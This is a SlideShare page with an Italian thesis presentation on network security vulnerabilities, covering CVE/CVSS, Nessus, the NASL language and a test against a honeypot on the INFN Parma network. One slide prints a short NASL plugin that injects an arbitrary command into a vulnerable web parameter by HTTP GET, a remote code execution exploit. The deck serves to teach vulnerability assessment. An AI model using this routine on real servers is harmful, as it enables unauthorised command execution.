SlideShare a Scribd company logo
RAFT
Sicurezza delle Reti Informatiche
Le vulnerabilit`a
Riccardo Melioli
27 ottobre 2016
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 1 / 19
RAFT
Obiettivi
Obiettivi
Metodi utilizzati per l’attacco e la difesa delle reti informatiche.
Vulnerabilit`a e tool inerenti.
Caso d’uso alla rete INFN di Parma.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 2 / 19
RAFT
Cos’`e la Sicurezza informatica
Sicurezza informatica
analisi delle vulnerabilit`a.
analisi del rischio.
analisi delle minacce.
protezione dell’integrit`a logico-funzionale.
Sicurezza delle reti informatiche
verifica della presenza delle vulnerabilit`a nella rete.
sicurezza delle comunicazioni tra i nodi della rete.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 3 / 19
RAFT
Perch´e studiarla
Informatizzazione della societ`a
La crescente informatizzazione della societ`a e dei servizi hanno aumentato
progressivamente l’interesse nella sicurezza informatica, in particolare i
settori dove le informazioni sono di importanza critica.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 4 / 19
RAFT
Problematiche della sicurezza delle reti
Compromesso Sicurezza-Usabilit`a
Compromesso tra le misure di sicurezza da adottare per proteggere la rete
da accessi indesiderati e l’usabilit`a con cui viene utilizzata.
Presenza Vulnerabilit`a
Presenza di falle che possono compromettere l’intero funzionamento della
rete stessa e l’integrit`a dei nodi da cui `e composta.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 5 / 19
RAFT
Definizione
Vulnerabilit`a
Componente di un sistema, in corrispondenza alla quale le misure di
sicurezza possono essere assenti o ridotte, rappresentando un punto
debole del sistema e permettendo ad un eventuale aggressore di
comprometterne il livello di sicurezza.
Le vulnerabilit`a sono dovute a:
Bug del software;
Problematiche dovute al funzionamento di protocolli.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 6 / 19
RAFT
Categorizzazione
Categorie di Vulnerabilit`a
Le categorie delle vulnerabilit`a sono identificate in base al tipo di
disservizio che possono causare.
Nell’immagine sono quantificate le vulnerabilit`a, suddivise per tipo di disservizio, rilevate in internet dal 1999 ad Agosto 2016
[CVE Details].
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 7 / 19
RAFT
Vulnerability Database
Vulnerability Database
Un Vulnerability Database `e una piattaforma volta a raccogliere,
mantenere e diffondere informazioni sulle vulnerabilit`a scoperte nei
sistemi informatici.
I database di vulnerabilit`a identificano le vulnerabilit`a, tramite le CVE
(Common Vulnerabilities and Exposures) e ne classificano la gravit`a
tramite CVSS.
Ad ogni vulnerabilit`a CVE `e associato uno score CVSS, che `e un valore
tra 0 e 10 stimato in base a delle metriche:
Access Vector;
Integrity;
...
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 8 / 19
RAFT
Valutare il livello di sicurezza di un sistema
Vulnerability Assessment
Processo volto a valutare l’efficacia dei meccanismi di sicurezza, si
suddivide nelle seguenti fasi:
1 Individuazione delle vulnerabilit`a.
2 Quantificazione della gravit`a.
3 Assegnazione delle priorit`a.
Vulnerability Scanner
Programmi progettati per ricercare e valutare le vulnerabilit`a di
un’applicazione, di un computer o di una rete.
Solitamente orientati alle grandi reti perci`o effettuano scansioni ad ampio
spettro e non invasive.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 9 / 19
RAFT
Nessus
Architettura
Nessus `e strutturato per l’utilizzo di plugin, che lo rendono dinamico e
flessibile, in base al tipo di scansione richiesta. E’ composto da:
Manager: core dell’applicazione.
Interprete NASL: esegue i plugin scritti in linguaggio NASL.
Scansione delle vulnerabilit`a in Nessus
1 Verifica quali host sono attivi nella rete.
2 Effettua port scanning per ogni host attivo.
3 Ricerca le vulnerabilit`a tramite test non invasivi, effettuati con i relativi
plugin.
4 Identifica le vulnerabilit`a tramite confronto con il vulnerability database.
5 Genera un report.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 10 / 19
RAFT
Metodologia per la verifica della presenza vulnerabilit`a
Problemi
I Vulnerability scanner possono presentare le seguenti problematiche:
generazione falsi positivi in situazioni dove vi sono sistemi di difesa
(Firewall, Proxy, IDS, ...);
informazioni superficiali a causa della non invasivit`a delle scansioni,
per non compromette i sistemi.
Soluzione
Approfondire le scansioni verificando l’effettiva presenza mediante
l’utilizzo di plugin in NASL opportunamente sviluppati per quelle
vulnerabilit`a.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 11 / 19
RAFT
Perch´e utilizzare il linguaggio NASL?
Cos’`e
NASL(Nessus Attack Scripting Language) `e un linguaggio di scripting
specializzato per l’ambito delle reti, che consente di sviluppare plugin in
grado di compiere attacchi a diversi livelli della pila ISO/OSI.
Vantaggi
Semplicit`a: `e provvisto di librerie specializzate per gli attacchi,
rendendo semplice e veloce la creazione di plugin.
Sicurezza: Nessus esegue i plugin isolati dal sistema operativo
dell’attaccante, garantendo il completo anonimato.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 12 / 19
RAFT
Caso d’uso: Rete INFN Parma
Obiettivo
Applicare la teoria studiata alla rete INFN, quindi si `e utilizzata la
metodologia precedentemente vista, composta dalle seguenti fasi:
1 Scansione non invasiva delle vulnerabilit`a mediante Nessus.
2 Sviluppo di un plugin che utilizzi una vulnerabilit`a rilevata per
effettuare un attacco, verificandone di conseguenza la presenza.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 13 / 19
RAFT
Problematiche nell’effettuare l’attacco
Tutela dei dati e business continuity dell’INFN
Per motivi di privacy dei dati presenti su tali host e per motivi di business
continuity dei progetti INFN, si `e messo a disposizione un honeypot,
appositamente inserito nella rete INFN.
Honeypot
Componente hardware o software che sembra essere parte della rete e
contenere informazioni, ma che in realt`a `e ben isolato e non ha contenuti
sensibili o critici.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 14 / 19
RAFT
Scansione delle vulnerabilit`a
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 15 / 19
RAFT
Scansione delle vulnerabilit`a
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 15 / 19
RAFT
Scansione delle vulnerabilit`a
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 15 / 19
RAFT
Scansione delle vulnerabilit`a
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 15 / 19
RAFT
Scansione delle vulnerabilit`a
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 15 / 19
RAFT
Scansione delle vulnerabilit`a
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 15 / 19
RAFT
Scansione delle vulnerabilit`a
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 15 / 19
RAFT
Scansione delle vulnerabilit`a
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 15 / 19
RAFT
Plugin in NASL utilizzato per l’attacco
RCE attack (Remote Code Execution)
Attacco che permette all’attaccante di eseguire qualsiasi comando da
remoto su un potenziale obiettivo, che pu`o essere un elaboratore o un
processo eseguito da esso.
Fasi Attacco
1 Identificazione Host e path del file vulnerabile nel server Web.
2 Scelta comando da eseguire sulla macchina della vittima.
3 Formattazione e composizione URI in modo che sfrutti la
vulnerabilit`a.
4 Effettua la richiesta GET dell’URI.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 16 / 19
RAFT
ipAddress = get_host_ip ();
port = get_http_port(default :80);
file = prompt(” Path f i l e v u l n e r a b i l e : ”);
param = prompt(”Nome Parametro : ”);
cmd = prompt(”Comando da e s e g u i r e : ”);
cmd = str_replace(string: cmd , find: ” ”, replace: ”
%20”);
finalString = strcat(” http : / / ”, ipAddress , file , ” ? ”,
param , ”=”, cmd);
soc = http_open_socket (port);
request = http_get(port: port , item: finalString);
send(socket:soc , data: request);
resp = http_recv(socket: soc);
http_close_socket (soc);
¥
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 17 / 19
RAFT
Scansione dell vulnerabilit`a
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 17 / 19
RAFT
Scansione dell vulnerabilit`a
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 17 / 19
RAFT
Conclusioni e Sviluppi Futuri
Conclusioni
Con il presente lavoro sono stati analizzati i metodi utilizzati per l’attacco
e la difesa delle reti informatiche, illustrando con particolare attenzione le
vulnerabilit`a, ed infine con l’applicazione del caso d’uso si `e dimostrato
quando visto.
Sviluppi futuri
Un possibile sviluppo futuro, avendo disponibilit`a di calcolo e di
monitoraggio adeguate, sarebbe di estendere quanto visto ed applicato a
reti di dimensione maggiori.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 18 / 19
RAFT
Grazie per l’attenzione
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 19 / 19

More Related Content

What's hot

Vulnerability Assessment and Penetration Testing Framework by Falgun Rathod
Vulnerability Assessment and Penetration Testing Framework by Falgun RathodVulnerability Assessment and Penetration Testing Framework by Falgun Rathod
Vulnerability Assessment and Penetration Testing Framework by Falgun Rathod
Falgun Rathod
 
Open source cloud native security with threat mapper
Open source cloud native security with threat mapperOpen source cloud native security with threat mapper
Open source cloud native security with threat mapper
LibbySchulze
 
ArcSight Forwarding Connector Configuration Guide
ArcSight Forwarding Connector Configuration Guide	ArcSight Forwarding Connector Configuration Guide
ArcSight Forwarding Connector Configuration Guide
Protect724manoj
 
OpenVAS
OpenVASOpenVAS
OpenVAS
svm
 
Cscu module 02 securing operating systems
Cscu module 02 securing operating systemsCscu module 02 securing operating systems
Cscu module 02 securing operating systems
Alireza Ghahrood
 
Vulnerability Management: What You Need to Know to Prioritize Risk
Vulnerability Management: What You Need to Know to Prioritize RiskVulnerability Management: What You Need to Know to Prioritize Risk
Vulnerability Management: What You Need to Know to Prioritize Risk
AlienVault
 
SOC Cyber Security
SOC Cyber SecuritySOC Cyber Security
SOC Cyber Security
Steppa Cyber Security
 
SOAR and SIEM.pptx
SOAR and SIEM.pptxSOAR and SIEM.pptx
SOAR and SIEM.pptx
Ajit Wadhawan
 
INCIDENT RESPONSE OVERVIEW
INCIDENT RESPONSE OVERVIEWINCIDENT RESPONSE OVERVIEW
INCIDENT RESPONSE OVERVIEW
Sylvain Martinez
 
Palo alto networks product overview
Palo alto networks product overviewPalo alto networks product overview
Palo alto networks product overviewBelsoft
 
Making Log Data Useful: SIEM and Log Management Together
Making Log Data Useful: SIEM and Log Management TogetherMaking Log Data Useful: SIEM and Log Management Together
Making Log Data Useful: SIEM and Log Management Together
Anton Chuvakin
 
Vulnerability Assessment Presentation
Vulnerability Assessment PresentationVulnerability Assessment Presentation
Vulnerability Assessment Presentation
Lionel Medina
 
Alphorm.com Formation Analyse de Malware 1/2 : Le guide complet
Alphorm.com Formation Analyse de Malware 1/2 : Le guide completAlphorm.com Formation Analyse de Malware 1/2 : Le guide complet
Alphorm.com Formation Analyse de Malware 1/2 : Le guide complet
Alphorm
 
Cybersecurity Risk Management for Financial Institutions
Cybersecurity Risk Management for Financial InstitutionsCybersecurity Risk Management for Financial Institutions
Cybersecurity Risk Management for Financial Institutions
Sarah Cirelli
 
Cyber Security Operations Center (C-SOC)
Cyber Security Operations Center (C-SOC) Cyber Security Operations Center (C-SOC)
Cyber Security Operations Center (C-SOC)
BGA Cyber Security
 
Faire un scan du réseau avec NMAP
Faire un scan du réseau avec NMAPFaire un scan du réseau avec NMAP
Faire un scan du réseau avec NMAP
Club Scientifique de l'ESI - CSE
 
Application Threat Modeling
Application Threat ModelingApplication Threat Modeling
Application Threat ModelingMarco Morana
 
The Next Generation of Security Operations Centre (SOC)
The Next Generation of Security Operations Centre (SOC)The Next Generation of Security Operations Centre (SOC)
The Next Generation of Security Operations Centre (SOC)
PECB
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testing
Abu Sadat Mohammed Yasin
 
Architecture centric support for security orchestration and automation
Architecture centric support for security orchestration and automationArchitecture centric support for security orchestration and automation
Architecture centric support for security orchestration and automation
Chadni Islam
 

What's hot (20)

Vulnerability Assessment and Penetration Testing Framework by Falgun Rathod
Vulnerability Assessment and Penetration Testing Framework by Falgun RathodVulnerability Assessment and Penetration Testing Framework by Falgun Rathod
Vulnerability Assessment and Penetration Testing Framework by Falgun Rathod
 
Open source cloud native security with threat mapper
Open source cloud native security with threat mapperOpen source cloud native security with threat mapper
Open source cloud native security with threat mapper
 
ArcSight Forwarding Connector Configuration Guide
ArcSight Forwarding Connector Configuration Guide	ArcSight Forwarding Connector Configuration Guide
ArcSight Forwarding Connector Configuration Guide
 
OpenVAS
OpenVASOpenVAS
OpenVAS
 
Cscu module 02 securing operating systems
Cscu module 02 securing operating systemsCscu module 02 securing operating systems
Cscu module 02 securing operating systems
 
Vulnerability Management: What You Need to Know to Prioritize Risk
Vulnerability Management: What You Need to Know to Prioritize RiskVulnerability Management: What You Need to Know to Prioritize Risk
Vulnerability Management: What You Need to Know to Prioritize Risk
 
SOC Cyber Security
SOC Cyber SecuritySOC Cyber Security
SOC Cyber Security
 
SOAR and SIEM.pptx
SOAR and SIEM.pptxSOAR and SIEM.pptx
SOAR and SIEM.pptx
 
INCIDENT RESPONSE OVERVIEW
INCIDENT RESPONSE OVERVIEWINCIDENT RESPONSE OVERVIEW
INCIDENT RESPONSE OVERVIEW
 
Palo alto networks product overview
Palo alto networks product overviewPalo alto networks product overview
Palo alto networks product overview
 
Making Log Data Useful: SIEM and Log Management Together
Making Log Data Useful: SIEM and Log Management TogetherMaking Log Data Useful: SIEM and Log Management Together
Making Log Data Useful: SIEM and Log Management Together
 
Vulnerability Assessment Presentation
Vulnerability Assessment PresentationVulnerability Assessment Presentation
Vulnerability Assessment Presentation
 
Alphorm.com Formation Analyse de Malware 1/2 : Le guide complet
Alphorm.com Formation Analyse de Malware 1/2 : Le guide completAlphorm.com Formation Analyse de Malware 1/2 : Le guide complet
Alphorm.com Formation Analyse de Malware 1/2 : Le guide complet
 
Cybersecurity Risk Management for Financial Institutions
Cybersecurity Risk Management for Financial InstitutionsCybersecurity Risk Management for Financial Institutions
Cybersecurity Risk Management for Financial Institutions
 
Cyber Security Operations Center (C-SOC)
Cyber Security Operations Center (C-SOC) Cyber Security Operations Center (C-SOC)
Cyber Security Operations Center (C-SOC)
 
Faire un scan du réseau avec NMAP
Faire un scan du réseau avec NMAPFaire un scan du réseau avec NMAP
Faire un scan du réseau avec NMAP
 
Application Threat Modeling
Application Threat ModelingApplication Threat Modeling
Application Threat Modeling
 
The Next Generation of Security Operations Centre (SOC)
The Next Generation of Security Operations Centre (SOC)The Next Generation of Security Operations Centre (SOC)
The Next Generation of Security Operations Centre (SOC)
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testing
 
Architecture centric support for security orchestration and automation
Architecture centric support for security orchestration and automationArchitecture centric support for security orchestration and automation
Architecture centric support for security orchestration and automation
 

Similar to Presentazione Tesi di Laurea sulla Sicurezza delle Reti Informatiche: Le vulnerabilità

Sicurezza in Rete
Sicurezza in ReteSicurezza in Rete
Sicurezza in Rete
Vincenzo Calabrò
 
Smau Milano 2019 Luca Bonadimani (AIPSI)
Smau Milano 2019 Luca Bonadimani (AIPSI)Smau Milano 2019 Luca Bonadimani (AIPSI)
Smau Milano 2019 Luca Bonadimani (AIPSI)
SMAU
 
Smau Milano 2014 - Andrea Zwirner
Smau Milano 2014 - Andrea ZwirnerSmau Milano 2014 - Andrea Zwirner
Smau Milano 2014 - Andrea Zwirner
SMAU
 
Intrusion Detection Systems
Intrusion Detection SystemsIntrusion Detection Systems
Intrusion Detection Systems
jekil
 
Progetti Open Source Per La Sicurezza Delle Web Applications
Progetti Open Source Per La Sicurezza Delle Web ApplicationsProgetti Open Source Per La Sicurezza Delle Web Applications
Progetti Open Source Per La Sicurezza Delle Web ApplicationsMarco Morana
 
Marco Bozzetti AIPSI - SMAU Milano 2017
Marco Bozzetti AIPSI - SMAU Milano 2017Marco Bozzetti AIPSI - SMAU Milano 2017
Marco Bozzetti AIPSI - SMAU Milano 2017
SMAU
 
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
Simone Onofri
 
Intelligence: tecnologie e servizi
Intelligence: tecnologie e servizi Intelligence: tecnologie e servizi
Intelligence: tecnologie e servizi
Leonardo
 
Pentesting Android with BackBox 4
Pentesting Android with BackBox 4Pentesting Android with BackBox 4
Pentesting Android with BackBox 4
raffaele_forte
 
Wardriving Milano
Wardriving MilanoWardriving Milano
Wardriving Milano
Matteo Flora
 
Cybersecurity e Vulnerabilita' dei sistemi SCADA
Cybersecurity e Vulnerabilita' dei sistemi SCADACybersecurity e Vulnerabilita' dei sistemi SCADA
Cybersecurity e Vulnerabilita' dei sistemi SCADA
iDIALOGHI
 
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
Codemotion
 
GDPR & GDPR - Confindustria Ravenna - Alessandro Rani
GDPR & GDPR - Confindustria Ravenna - Alessandro RaniGDPR & GDPR - Confindustria Ravenna - Alessandro Rani
GDPR & GDPR - Confindustria Ravenna - Alessandro Rani
Adalberto Casalboni
 
Cyber Defense - How to find and manage zero-days
Cyber Defense - How to find and manage zero-days Cyber Defense - How to find and manage zero-days
Cyber Defense - How to find and manage zero-days
Simone Onofri
 
HealthCare CyberSecurity Swascan
HealthCare CyberSecurity SwascanHealthCare CyberSecurity Swascan
HealthCare CyberSecurity Swascan
Pierguido Iezzi
 
La complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppoLa complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppoMarco Ferrigno
 
CCI 2019 - SQL Injection - Black Hat Vs White Hat
CCI 2019 - SQL Injection - Black Hat Vs White HatCCI 2019 - SQL Injection - Black Hat Vs White Hat
CCI 2019 - SQL Injection - Black Hat Vs White Hat
walk2talk srl
 
Enterprise digital forensics e sicurezza con strumenti open Automatizzare Aud...
Enterprise digital forensics e sicurezza con strumenti open Automatizzare Aud...Enterprise digital forensics e sicurezza con strumenti open Automatizzare Aud...
Enterprise digital forensics e sicurezza con strumenti open Automatizzare Aud...
Studio Fiorenzi Security & Forensics
 
Sicurezza Informatica Nelle Aziende Installfest2007
Sicurezza Informatica Nelle Aziende Installfest2007Sicurezza Informatica Nelle Aziende Installfest2007
Sicurezza Informatica Nelle Aziende Installfest2007
jekil
 
La sicurezza delle informazioni nell’era del Web 2.0
La sicurezza delle informazioni nell’era del Web 2.0La sicurezza delle informazioni nell’era del Web 2.0
La sicurezza delle informazioni nell’era del Web 2.0
hantex
 

Similar to Presentazione Tesi di Laurea sulla Sicurezza delle Reti Informatiche: Le vulnerabilità (20)

Sicurezza in Rete
Sicurezza in ReteSicurezza in Rete
Sicurezza in Rete
 
Smau Milano 2019 Luca Bonadimani (AIPSI)
Smau Milano 2019 Luca Bonadimani (AIPSI)Smau Milano 2019 Luca Bonadimani (AIPSI)
Smau Milano 2019 Luca Bonadimani (AIPSI)
 
Smau Milano 2014 - Andrea Zwirner
Smau Milano 2014 - Andrea ZwirnerSmau Milano 2014 - Andrea Zwirner
Smau Milano 2014 - Andrea Zwirner
 
Intrusion Detection Systems
Intrusion Detection SystemsIntrusion Detection Systems
Intrusion Detection Systems
 
Progetti Open Source Per La Sicurezza Delle Web Applications
Progetti Open Source Per La Sicurezza Delle Web ApplicationsProgetti Open Source Per La Sicurezza Delle Web Applications
Progetti Open Source Per La Sicurezza Delle Web Applications
 
Marco Bozzetti AIPSI - SMAU Milano 2017
Marco Bozzetti AIPSI - SMAU Milano 2017Marco Bozzetti AIPSI - SMAU Milano 2017
Marco Bozzetti AIPSI - SMAU Milano 2017
 
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
 
Intelligence: tecnologie e servizi
Intelligence: tecnologie e servizi Intelligence: tecnologie e servizi
Intelligence: tecnologie e servizi
 
Pentesting Android with BackBox 4
Pentesting Android with BackBox 4Pentesting Android with BackBox 4
Pentesting Android with BackBox 4
 
Wardriving Milano
Wardriving MilanoWardriving Milano
Wardriving Milano
 
Cybersecurity e Vulnerabilita' dei sistemi SCADA
Cybersecurity e Vulnerabilita' dei sistemi SCADACybersecurity e Vulnerabilita' dei sistemi SCADA
Cybersecurity e Vulnerabilita' dei sistemi SCADA
 
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
 
GDPR & GDPR - Confindustria Ravenna - Alessandro Rani
GDPR & GDPR - Confindustria Ravenna - Alessandro RaniGDPR & GDPR - Confindustria Ravenna - Alessandro Rani
GDPR & GDPR - Confindustria Ravenna - Alessandro Rani
 
Cyber Defense - How to find and manage zero-days
Cyber Defense - How to find and manage zero-days Cyber Defense - How to find and manage zero-days
Cyber Defense - How to find and manage zero-days
 
HealthCare CyberSecurity Swascan
HealthCare CyberSecurity SwascanHealthCare CyberSecurity Swascan
HealthCare CyberSecurity Swascan
 
La complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppoLa complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppo
 
CCI 2019 - SQL Injection - Black Hat Vs White Hat
CCI 2019 - SQL Injection - Black Hat Vs White HatCCI 2019 - SQL Injection - Black Hat Vs White Hat
CCI 2019 - SQL Injection - Black Hat Vs White Hat
 
Enterprise digital forensics e sicurezza con strumenti open Automatizzare Aud...
Enterprise digital forensics e sicurezza con strumenti open Automatizzare Aud...Enterprise digital forensics e sicurezza con strumenti open Automatizzare Aud...
Enterprise digital forensics e sicurezza con strumenti open Automatizzare Aud...
 
Sicurezza Informatica Nelle Aziende Installfest2007
Sicurezza Informatica Nelle Aziende Installfest2007Sicurezza Informatica Nelle Aziende Installfest2007
Sicurezza Informatica Nelle Aziende Installfest2007
 
La sicurezza delle informazioni nell’era del Web 2.0
La sicurezza delle informazioni nell’era del Web 2.0La sicurezza delle informazioni nell’era del Web 2.0
La sicurezza delle informazioni nell’era del Web 2.0
 

Presentazione Tesi di Laurea sulla Sicurezza delle Reti Informatiche: Le vulnerabilità

  • 1. RAFT Sicurezza delle Reti Informatiche Le vulnerabilit`a Riccardo Melioli 27 ottobre 2016 Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 1 / 19
  • 2. RAFT Obiettivi Obiettivi Metodi utilizzati per l’attacco e la difesa delle reti informatiche. Vulnerabilit`a e tool inerenti. Caso d’uso alla rete INFN di Parma. Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 2 / 19
  • 3. RAFT Cos’`e la Sicurezza informatica Sicurezza informatica analisi delle vulnerabilit`a. analisi del rischio. analisi delle minacce. protezione dell’integrit`a logico-funzionale. Sicurezza delle reti informatiche verifica della presenza delle vulnerabilit`a nella rete. sicurezza delle comunicazioni tra i nodi della rete. Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 3 / 19
  • 4. RAFT Perch´e studiarla Informatizzazione della societ`a La crescente informatizzazione della societ`a e dei servizi hanno aumentato progressivamente l’interesse nella sicurezza informatica, in particolare i settori dove le informazioni sono di importanza critica. Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 4 / 19
  • 5. RAFT Problematiche della sicurezza delle reti Compromesso Sicurezza-Usabilit`a Compromesso tra le misure di sicurezza da adottare per proteggere la rete da accessi indesiderati e l’usabilit`a con cui viene utilizzata. Presenza Vulnerabilit`a Presenza di falle che possono compromettere l’intero funzionamento della rete stessa e l’integrit`a dei nodi da cui `e composta. Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 5 / 19
  • 6. RAFT Definizione Vulnerabilit`a Componente di un sistema, in corrispondenza alla quale le misure di sicurezza possono essere assenti o ridotte, rappresentando un punto debole del sistema e permettendo ad un eventuale aggressore di comprometterne il livello di sicurezza. Le vulnerabilit`a sono dovute a: Bug del software; Problematiche dovute al funzionamento di protocolli. Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 6 / 19
  • 7. RAFT Categorizzazione Categorie di Vulnerabilit`a Le categorie delle vulnerabilit`a sono identificate in base al tipo di disservizio che possono causare. Nell’immagine sono quantificate le vulnerabilit`a, suddivise per tipo di disservizio, rilevate in internet dal 1999 ad Agosto 2016 [CVE Details]. Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 7 / 19
  • 8. RAFT Vulnerability Database Vulnerability Database Un Vulnerability Database `e una piattaforma volta a raccogliere, mantenere e diffondere informazioni sulle vulnerabilit`a scoperte nei sistemi informatici. I database di vulnerabilit`a identificano le vulnerabilit`a, tramite le CVE (Common Vulnerabilities and Exposures) e ne classificano la gravit`a tramite CVSS. Ad ogni vulnerabilit`a CVE `e associato uno score CVSS, che `e un valore tra 0 e 10 stimato in base a delle metriche: Access Vector; Integrity; ... Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 8 / 19
  • 9. RAFT Valutare il livello di sicurezza di un sistema Vulnerability Assessment Processo volto a valutare l’efficacia dei meccanismi di sicurezza, si suddivide nelle seguenti fasi: 1 Individuazione delle vulnerabilit`a. 2 Quantificazione della gravit`a. 3 Assegnazione delle priorit`a. Vulnerability Scanner Programmi progettati per ricercare e valutare le vulnerabilit`a di un’applicazione, di un computer o di una rete. Solitamente orientati alle grandi reti perci`o effettuano scansioni ad ampio spettro e non invasive. Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 9 / 19
  • 10. RAFT Nessus Architettura Nessus `e strutturato per l’utilizzo di plugin, che lo rendono dinamico e flessibile, in base al tipo di scansione richiesta. E’ composto da: Manager: core dell’applicazione. Interprete NASL: esegue i plugin scritti in linguaggio NASL. Scansione delle vulnerabilit`a in Nessus 1 Verifica quali host sono attivi nella rete. 2 Effettua port scanning per ogni host attivo. 3 Ricerca le vulnerabilit`a tramite test non invasivi, effettuati con i relativi plugin. 4 Identifica le vulnerabilit`a tramite confronto con il vulnerability database. 5 Genera un report. Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 10 / 19
  • 11. RAFT Metodologia per la verifica della presenza vulnerabilit`a Problemi I Vulnerability scanner possono presentare le seguenti problematiche: generazione falsi positivi in situazioni dove vi sono sistemi di difesa (Firewall, Proxy, IDS, ...); informazioni superficiali a causa della non invasivit`a delle scansioni, per non compromette i sistemi. Soluzione Approfondire le scansioni verificando l’effettiva presenza mediante l’utilizzo di plugin in NASL opportunamente sviluppati per quelle vulnerabilit`a. Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 11 / 19
  • 12. RAFT Perch´e utilizzare il linguaggio NASL? Cos’`e NASL(Nessus Attack Scripting Language) `e un linguaggio di scripting specializzato per l’ambito delle reti, che consente di sviluppare plugin in grado di compiere attacchi a diversi livelli della pila ISO/OSI. Vantaggi Semplicit`a: `e provvisto di librerie specializzate per gli attacchi, rendendo semplice e veloce la creazione di plugin. Sicurezza: Nessus esegue i plugin isolati dal sistema operativo dell’attaccante, garantendo il completo anonimato. Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 12 / 19
  • 13. RAFT Caso d’uso: Rete INFN Parma Obiettivo Applicare la teoria studiata alla rete INFN, quindi si `e utilizzata la metodologia precedentemente vista, composta dalle seguenti fasi: 1 Scansione non invasiva delle vulnerabilit`a mediante Nessus. 2 Sviluppo di un plugin che utilizzi una vulnerabilit`a rilevata per effettuare un attacco, verificandone di conseguenza la presenza. Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 13 / 19
  • 14. RAFT Problematiche nell’effettuare l’attacco Tutela dei dati e business continuity dell’INFN Per motivi di privacy dei dati presenti su tali host e per motivi di business continuity dei progetti INFN, si `e messo a disposizione un honeypot, appositamente inserito nella rete INFN. Honeypot Componente hardware o software che sembra essere parte della rete e contenere informazioni, ma che in realt`a `e ben isolato e non ha contenuti sensibili o critici. Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 14 / 19
  • 15. RAFT Scansione delle vulnerabilit`a Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 15 / 19
  • 16. RAFT Scansione delle vulnerabilit`a Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 15 / 19
  • 17. RAFT Scansione delle vulnerabilit`a Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 15 / 19
  • 18. RAFT Scansione delle vulnerabilit`a Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 15 / 19
